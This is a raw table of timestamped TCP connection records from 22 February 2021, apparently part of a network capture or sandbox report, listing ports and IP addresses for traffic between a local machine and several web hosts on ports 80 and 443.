                                                                                                                                                Feb 22, 2021 23:44:13.878016949 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:13.903878927 CET44349749104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:13.903945923 CET44349749104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:13.904026031 CET49749443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:13.904068947 CET49749443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:13.936362028 CET44349758104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:13.936515093 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:13.938411951 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:13.994761944 CET44349758104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:13.994812965 CET44349758104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:13.994888067 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:13.995460033 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:14.002254009 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:14.051827908 CET44349758104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.058690071 CET44349758104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.175012112 CET44349758104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.175122976 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:14.179764986 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.236104012 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.236252069 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.237263918 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.293787003 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.293833971 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.293976068 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.295322895 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.308393002 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.351533890 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.364680052 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487119913 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487186909 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487224102 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487231970 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.487272024 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.487276077 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487312078 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487312078 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.487344980 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.487355947 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487360954 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.487391949 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487418890 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487447023 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.487447023 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.487479925 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.487490892 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.487677097 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.487701893 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.488316059 CET4975180192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:14.489350080 CET4976080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:14.537158966 CET8049751172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.537251949 CET4975180192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:14.545625925 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.545665979 CET44349759104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.545711040 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.545751095 CET49759443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:14.552531958 CET8049760172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:14.552644968 CET4976080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:14.553173065 CET4976080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:14.614867926 CET8049760172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.006872892 CET8049760172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.007148027 CET4976080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.011322975 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.066524029 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.066759109 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.067173004 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.122474909 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.125086069 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.125261068 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.126076937 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.140302896 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.181372881 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.195456982 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.675020933 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.675048113 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.675067902 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.675081968 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.675098896 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.675113916 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.675127983 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.675148010 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.675246000 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.675369024 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.675982952 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.676031113 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.700531960 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.700553894 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.700805902 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.700819969 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.700872898 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.700933933 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.700943947 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.700948000 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.701458931 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.701479912 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.701570988 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.702797890 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.702820063 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.702966928 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.704143047 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.704166889 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.704252958 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.705477953 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.705511093 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.705575943 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.706607103 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.706628084 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.706691980 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.707892895 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.707914114 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.707976103 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.709187984 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.709208965 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.709264994 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.710516930 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.710541964 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.710606098 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.711759090 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.711796045 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.711843967 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.711972952 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.728328943 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.728362083 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.728456020 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.728889942 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.728910923 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.728976011 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.730180025 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.730205059 CET44349761172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.730264902 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.730345964 CET49761443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:15.787779093 CET4975380192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:15.789704084 CET4976280192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:15.858012915 CET80497625.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.858195066 CET4976280192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:15.858886957 CET80497535.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.858989954 CET4975380192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:15.859553099 CET4976280192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:15.928695917 CET80497625.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.928906918 CET80497625.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:15.929013014 CET4976280192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:15.934247017 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.005379915 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.005570889 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.006624937 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.077852011 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.077894926 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.078130960 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.078941107 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.086160898 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.157257080 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.517544031 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.517601013 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.517642975 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.517668962 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.517685890 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.517713070 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.517728090 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.517777920 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.517779112 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.517817974 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.517831087 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.517904997 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.517910957 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.518160105 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.520522118 CET4975580192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:16.521925926 CET4976480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:16.589289904 CET443497635.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.589410067 CET49763443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:16.684825897 CET8049764192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.684933901 CET4976480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:16.686091900 CET4976480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:16.688025951 CET8049755192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.688143969 CET4975580192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:16.848862886 CET8049764192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.848913908 CET8049764192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.849028111 CET4976480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:16.853704929 CET49756443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:16.883419991 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:16.900604010 CET44349756216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.903656006 CET44349756216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.903796911 CET49756443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:16.924479961 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.924601078 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:16.925559998 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:16.966542006 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.977118969 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.977201939 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:16.977216959 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.977261066 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:16.977283955 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:16.977319956 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:16.986412048 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:17.034535885 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.036549091 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.036681890 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:17.037384987 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:17.083590984 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.220180988 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.220227003 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.220266104 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:17.220276117 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.220303059 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:17.220309973 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.220340014 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:17.220360041 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:17.440629005 CET4975780192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.443263054 CET4976680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.497210979 CET8049757104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.497338057 CET4975780192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.499551058 CET8049766104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.499710083 CET4976680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.500819921 CET4976680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.557197094 CET8049766104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.667958021 CET8049766104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.669773102 CET4976680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.673413038 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.703119993 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.731093884 CET44349758104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.731134892 CET44349758104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.731205940 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.731277943 CET49758443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.761718035 CET44349767104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.761854887 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.762347937 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.818979025 CET44349767104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.819526911 CET44349767104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.819681883 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.820746899 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.835649967 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:17.877264977 CET44349767104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.892112017 CET44349767104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.999692917 CET44349767104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.999950886 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:18.004559040 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.061055899 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.061218023 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.062040091 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.118360996 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.118412971 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.118540049 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.119455099 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.129777908 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.177608967 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.188092947 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.319669962 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.319735050 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.319767952 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.319803953 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.319932938 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.319957018 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.320095062 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.320112944 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.320147991 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.320211887 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.320240974 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.320262909 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.320333004 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.320363998 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.320368052 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.320574999 CET44349768104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.320782900 CET49768443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:18.322510004 CET4976080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:18.323853970 CET4976980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:18.384546041 CET8049760172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.384713888 CET4976080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:18.385914087 CET8049769172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:18.386195898 CET4976980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:18.387156010 CET4976980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:18.449323893 CET8049769172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.065728903 CET8049769172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.065990925 CET4976980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.075390100 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.137475967 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.137634039 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.139378071 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.203289986 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.207339048 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.207602024 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.208766937 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.222373962 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.270751953 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.284482956 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871220112 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871273041 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871299982 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.871315002 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871344090 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871360064 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.871376038 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.871385098 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871404886 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.871434927 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871473074 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.871479034 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871495962 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.871517897 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871556997 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.871578932 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.871594906 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.871615887 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.871962070 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.872001886 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.903712034 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.903762102 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.903785944 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.903840065 CET49770443192.168.2.6172.67.204.156
